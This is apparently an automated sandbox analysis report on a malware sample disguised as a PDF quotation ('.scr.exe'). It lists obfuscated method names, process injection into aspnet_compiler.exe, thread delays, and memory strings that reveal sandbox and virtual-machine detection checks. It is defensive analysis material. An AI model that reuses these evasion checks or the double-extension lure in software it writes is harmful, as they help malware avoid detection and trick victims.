Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7bfe80000.12.raw.unpack, JGdQe0bE0VWwd1eUu8a.cs	High entropy of concatenated method names: 'bohbpNYXrw', 'MmG00wkufbeWKI6FiBy', 'BQHeTtkWPeujXbfH88Q', 'CcaZTVqZXA66xdSNsmY', 'TY5t7lqQo4lgLnTCXOg'
Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b79d6938.7.raw.unpack, AssemblyLoader.cs	High entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'Q8VjDVpeFtinqeyWmy0'
Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b79d6938.7.raw.unpack, OAEVPXA0tqc8rHAo1Rl.cs	High entropy of concatenated method names: 'BYpAJn2vgm', 'eeDA3yIKMu', 'guvA2E3awv', 'G8dAq75Aq0', 'sM7AkuZJaF', 'GThYrMqnQUIQMkG3G6U', 'hqSrYyqBnRukgNDCBYP', 'aibt4vqjIpFOn5TyXVr', 'INIjRHqYuBUBRaaBrln', 'WZ25JdqtJuRQi4qhZ0a'
Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b79d6938.7.raw.unpack, JGdQe0bE0VWwd1eUu8a.cs	High entropy of concatenated method names: 'bohbpNYXrw', 'MmG00wkufbeWKI6FiBy', 'BQHeTtkWPeujXbfH88Q', 'CcaZTVqZXA66xdSNsmY', 'TY5t7lqQo4lgLnTCXOg'
Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b79d6938.7.raw.unpack, qFHbx242VP7CG5hqXEm.cs	High entropy of concatenated method names: 'vEJcxTpyGbTmboIH2RK', 'rri2MLpPqAmuKT4lOTW', 'qYWoo24Yem', 'MhURGLpH3nn1NdRjqXd', 'VsV1bqpFvSEep39P1kS', 'lwCA6TpXbjaTwGG9GlC', 'EpuYF5psDFF5xf79jIC', 'Ncdvy1pMZwuCV8Q2RXm', 'QwL3u4paooMCkvtIPdL', 'tmrf2Qp7UccyrZDuM62'
Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b79d6938.7.raw.unpack, lf6lF7b5GuTqgZIR3mQ.cs	High entropy of concatenated method names: 'YB2bUDIoM6', 'e16b9Twsn6', 'a11bvCXBh7', 'HYhbhaieuY', 'SlgbTfjM4T', 'tfpbnADLDQ', 'bddbButwwc', 'hEJbj21Fjd', 'FvhbYCokm8', 'af2btk9EBU'
Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b79d6938.7.raw.unpack, QkIaRKoqxk31ed3onh2.cs	High entropy of concatenated method names: 'bgOoHiqSmG', 'AwuoFPDZql', 'c2AoXEKDFJ', 'uoIosrrAI4', 'ld5oMPXIyx', 'rp9oaSuPNy', 'Jtio7KbvEV', 'pCOoZVduDh', 'Y1WoQMGDAa', 'Q7FoN6dfqB'
Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b79d6938.7.raw.unpack, beQG8hoz2wDhgID41FI.cs	High entropy of concatenated method names: 'K5qnRfDlFv', 'Bbsn16P8CW', 'mfTnCKgoRF', 'xevnxCe1FM', 'boLnLGYnAP', 'zgenODndsJ', 'nLgn6evdjg', 'hGg9gZ6fOM', 'poqnlDUt7x', 'Vajn0XaO4f'
Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b79d6938.7.raw.unpack, dWGF7q4T03KchkMUHdw.cs	High entropy of concatenated method names: 'qMU4Bb748L', 'esk4jgF15T', 'SupKI3wki91klVyIsfE', 'yTIV68wwuWLKyRa1MiB', 'tKQjfZwpcQSuSTOGFxL', 'QDVe0owfjkqEQhhQc1S', 'RBN7GUwrRVHLGiPkEqb', 'zZGoIJw8v5633sJJOaI', 'Tw92mrwyMWWW6gdbxqs', 'OUbDujwPqPZM1ZrHwep'
Source: 0.2.QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe.2c7b79d6938.7.raw.unpack, WO7efgmLsvk94SLNbM.cs	High entropy of concatenated method names: 'JkMRkVZt2', 'cre1qPNfB', 'RYYxLkQ0K', 'Rg3CGAu4U', 'HjtMm124hlXD85eyo18', 'VYjH9j2Um2v5Uv9a8vu', 'F7Cd4c2otNEPSGaw5d7'

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2316760953.000002C7A7D13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2316760953.000002C7A78FB000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SBIEDLL.DLLP]J
Source: QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe, 00000000.00000002.2316760953.000002C7A779B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: EXPLORERJSBIEDLL.DLLKCUCKOOMON.DLLLWIN32_PROCESS.HANDLE='{0}'MPARENTPROCESSIDNCMDOSELECT * FROM WIN32_BIOS8UNEXPECTED WMI QUERY FAILUREPVERSIONQSERIALNUMBERSVMWARE\|VIRTUAL\|A M I\|XENTSELECT * FROM WIN32_COMPUTERSYSTEMUMANUFACTURERVMODELWMICROSOFT\|VMWARE\|VIRTUALXJOHNYANNAZXXXXXXXX

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Memory allocated: 2C7A5A30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Memory allocated: 2C7BF6C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory allocated: 2C61AAE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Memory allocated: 2C632D20000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe

Code function: 0_2_00007FFD9BA166AF rdtsc

0_2_00007FFD9BA166AF

Source: C:\Users\user\Desktop\QUOTATION_OCTQTRA071244#U00b7PDF.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599233	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 599015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597481	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597155	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596172	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595844	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 595734	Jump to behavior
